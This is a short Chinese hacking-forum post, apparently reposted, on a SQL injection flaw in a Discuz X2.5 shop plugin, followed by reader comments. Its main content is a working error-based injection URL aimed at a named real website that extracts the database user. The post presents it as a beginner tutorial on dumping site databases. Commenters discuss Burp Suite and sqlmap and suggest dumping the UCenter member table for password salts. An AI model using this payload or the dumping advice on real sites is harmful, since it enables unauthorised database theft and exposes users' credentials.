DZx2.5 插件漏洞sql注入 {科普脱裤}
作者:j8g
直接看图吧~~
=======================================
漏洞是以前的了,主要是科普脱裤,转载来分享一下,大牛脚下留情~~
http://nba2kol.org/plugin.php?id=v63shop:goods&pac=info&gid=110%20or%20@`'`%20and%20[/url](select%20*%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20user()))a%20from%20information_schema.tables%20group%20by%20a)b)%20or%20@`'`
直接看图吧~~
=======================================
漏洞是以前的了,主要是科普脱裤,转载来分享一下,大牛脚下留情~~
关于作者
评论42次
通常使用脚本 或者cUrl 命令
我是说 这种类型的注入点 该如何构造
这个是不是只是局限于有插件的站!
编码不对的地方怎么办?
辛苦了,的确是科普了burp下,但是很实用,多谢。
我觉得写的蛮好的。很科普
现在很流行burp脱内裤啦,求火车头脱内裤科普文。
水印呢?科普burn 用法 感觉还是sqlmap犀利
虽然知道了,但是还是来顶一下。
好贴!必须得顶!
我表示又学到了burp suite的一种用法...
指定好-T —D -C后他自动存储在本地
这种方式注入可以用sqlmap 求科普 我不知道如何构造
我觉得更像是burp suite的科普教程
sqlmap跟快。。。。
中文乱码都没解决- -.
应该脱UCENTER MEMBER 那里有SALT
话说有编码不对的地方怎么办?
是呀
转载的?